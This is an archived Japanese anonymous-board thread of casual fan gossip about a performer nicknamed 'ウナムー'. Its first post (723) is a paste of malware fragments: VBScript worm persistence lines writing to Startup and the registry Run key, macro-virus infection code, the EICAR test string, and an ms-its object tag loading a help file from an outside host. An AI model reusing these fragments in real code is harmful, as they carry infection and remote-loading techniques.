723 :<body onload=window()>:2006/11/11(土) 23:33:34
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

724 :ユーは名無しネ:2006/11/11(土) 23:49:04
百式でちゃいなよウナムー

725 :ユーは名無しネ:2006/11/13(月) 18:10:14
ナウムー

726 :ユーは名無しネ:2006/11/17(金) 01:57:24


727 :ユーは名無しネ:2006/11/22(水) 18:56:08


728 :ユーは名無しネ:2006/11/29(水) 00:54:24


729 :ユーは名無しネ:2006/11/29(水) 11:53:46


730 :ユーは名無しネ:2006/11/29(水) 12:47:38


731 :ユーは名無しネ:2006/11/29(水) 19:17:37


732 :ユーは名無しネ:2006/11/29(水) 19:26:20


wwww

733 :ユーは名無しネ:2006/11/30(木) 01:30:16


734 :ユーは名無しネ:2006/11/30(木) 14:00:57


735 :ユーは名無しネ:2006/11/30(木) 16:58:25


736 :ユーは名無しネ:2006/11/30(木) 22:55:12


737 :ユーは名無しネ:2006/12/06(水) 22:18:59


738 :ユーは名無しネ:2006/12/16(土) 16:14:54
 ■   ■     ■                  ■
■■■■ ■   ■■■■■  ■■■■        ■■■■■
 ■ ■ ■■■ ■   ■     ■  ■ ■ ■   ■   ■■■■
 ■ ■ ■       ■     ■  ■ ■ ■ ■■■■■
 ■ ■ ■       ■ ■■■■■■     ■   ■

739 :ユーは名無しネ:2006/12/20(水) 15:26:00
738の何書いてあるかわかんないし

740 :ユーは名無しネ:2006/12/30(土) 02:42:14
コピペで見たら カトウユッキー だってさ

741 :ユーは名無しネ:2007/01/01(月) 05:23:34
ウナムー髪の毛切りすぎたんじゃないの?ウナムーorz

742 : 【大吉】 【485円】 :2007/01/01(月) 22:36:50
川 ΦeΦ)|bはいお年玉あげるギャー

743 :ユーは名無しネ:2007/01/04(木) 19:02:55
加藤

744 :ユーは名無しネ:2007/01/06(土) 01:40:05
手足短ryから小動物みたいでかわいいんじゃないの!?ウナムー

745 :ユーは名無しネ:2007/01/10(水) 09:47:12
あらちの入りでオーラ無かったな…いけめんだったが。

746 :ユーは名無しネ:2007/01/28(日) 17:09:52
髪明るくしすぎちゃったんじゃないのー


前髪揃ってるんじゃないのー

747 :ユーは名無しネ:2007/01/30(火) 21:36:43


748 :ユーは名無しネ:2007/02/01(木) 18:53:49


749 :ユーは名無しネ:2007/02/01(木) 20:29:27


750 :ユーは名無しネ:2007/02/02(金) 18:07:37
実際苺より売れてるよな

751 :ユーは名無しネ:2007/02/03(土) 02:46:38
c売り

752 :ユーは名無しネ:2007/02/03(土) 10:58:33
実際プラムより売れてるよな

753 :ユーは名無しネ:2007/02/03(土) 15:52:01
`売り

754 :ユーは名無しネ:2007/02/04(日) 15:39:54


755 :ユーは名無しネ:2007/02/04(日) 17:00:03
実際ヒラメより売れてるよな

756 :ユーは名無しネ:2007/02/05(月) 20:23:53
ウナムーよく見るとカッコイイぞ

757 :ユーは名無しネ:2007/02/05(月) 22:36:02
いやパッと見はかっこいいがよくみるとダメだ!

758 :ユーは名無しネ:2007/02/05(月) 22:48:28
ウナムーは今ニート生活か?

759 :ユーは名無しネ:2007/02/06(火) 00:45:43
アルバイd

760 :ユーは名無しネ:2007/02/06(火) 12:20:25
ダギャと似てる

761 :ユーは名無しネ:2007/02/09(金) 16:05:20
>>760
ちょwww

762 :ユーは名無しネ:2007/02/10(土) 16:47:00
顔濃いからかwwww

763 :ユーは名無しネ:2007/02/15(木) 22:39:51
ぶー

764 :ユーは名無しネ:2007/02/18(日) 20:43:33
芸能人の秘蔵映像キタ━━━━━━(゚∀゚)━━━━━━

http://tv9.2ch.net/test/read.cgi/actor/1170878857/54

765 :ユーは名無しネ:2007/02/19(月) 18:14:55
整形した?

766 :ユーは名無しネ:2007/02/19(月) 20:24:22
>765
ガチで?

84 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)